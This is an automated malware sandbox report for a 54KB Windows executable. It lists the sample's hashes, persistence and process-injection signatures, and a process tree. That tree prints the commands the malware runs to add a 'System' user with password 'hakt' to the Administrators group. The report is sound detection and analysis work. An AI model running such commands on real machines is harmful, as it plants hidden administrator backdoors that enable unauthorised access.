Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    140s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    03/02/2024, 00:18

General

  • Target

    8ae7bb9d6119c991386fa9ed8149c33e.exe

  • Size

    54KB

  • MD5

    8ae7bb9d6119c991386fa9ed8149c33e

  • SHA1

    2647ea011d14a51443c4e83c85e64124ab166d31

  • SHA256

    87d19e3bff436f6d204095917f7a2b1dd58d093d637b8cc0a6aa38b761832241

  • SHA512

    5239f922e773828896c6bfb98ec0cf1bc9688eadb3e858fa27cb71ed2f691d5e0ada63b8b14ab65139046d887d168f540e8062ff9fdea562cb0db980fc656a21

  • SSDEEP

    1536:ts+Zgajv3kHK35Y0RKsZ1Ls3JcBHHx/KboFwbQp8X:tFC4kq35Yds/Ls3JcBnAFby8

Score
6/10

Malware Config

Signatures

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8ae7bb9d6119c991386fa9ed8149c33e.exe
    "C:\Users\Admin\AppData\Local\Temp\8ae7bb9d6119c991386fa9ed8149c33e.exe"
    1⤵
    • Adds Run key to start application
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2920
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Windows\temp.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2724
      • C:\Windows\SysWOW64\net.exe
        net user /add System hakt
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2728
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 user /add System hakt
          4⤵
            PID:2824
        • C:\Windows\SysWOW64\net.exe
          net localgroup /add Administrators System
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2620
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 localgroup /add Administrators System
            4⤵
              PID:2564

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Windows\temp.bat

        Filesize

        89B

        MD5

        dccbf9e7aa8e5e8a7d44c634aa4b3e8a

        SHA1

        a2e14c86d1a890f37afe11e0ef02f3b5f05cf3c3

        SHA256

        554c21f981ac2139afa84e5af335c54fce3e0b05db145abef9eb7b2c23612398

        SHA512

        8581f237ce5a9df85ebee9f23fe56f6f27d37c6ea66e9c40cd73b6b85487b6e915f83e5a2740eabed7cd2133c6dca46bd062c5429e2223904ffd9aaff09c8e28

      • memory/2920-0-0x0000000000510000-0x0000000000520000-memory.dmp

        Filesize

        64KB

      • memory/2920-1-0x0000000000400000-0x000000000040E000-memory.dmp

        Filesize

        56KB

      • memory/2920-2-0x0000000000400000-0x000000000040E000-memory.dmp

        Filesize

        56KB

      • memory/2920-5-0x0000000000400000-0x000000000040E000-memory.dmp

        Filesize

        56KB

      • memory/2920-19-0x0000000074600000-0x0000000074604000-memory.dmp

        Filesize

        16KB